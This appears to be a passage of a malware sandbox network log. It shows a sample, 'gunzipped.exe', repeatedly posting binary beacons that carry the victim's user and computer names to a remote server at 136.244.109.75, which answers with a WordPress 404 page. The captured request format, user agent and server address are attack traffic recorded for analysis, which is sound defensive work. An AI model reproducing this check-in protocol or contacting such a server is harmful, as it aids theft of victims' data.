                          Apr 17, 2024 03:18:26.477698088 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:26.477735996 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:26.477756023 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:26.477781057 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:26.477801085 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:26.477822065 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:26.477855921 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:26.477894068 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:26.477993011 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          62192.168.2.549776136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:26.814059019 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:27.018201113 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:27.961832047 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:26 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:27.961890936 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:27.961930990 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:27.961971045 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:27.962012053 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:27.962052107 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:27.962094069 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:27.962136030 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:27.962174892 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:27.962215900 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          63192.168.2.549777136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:28.314688921 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:28.523677111 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:29.480891943 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:28 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:29.480922937 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:29.480966091 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:29.480983973 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:29.481005907 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
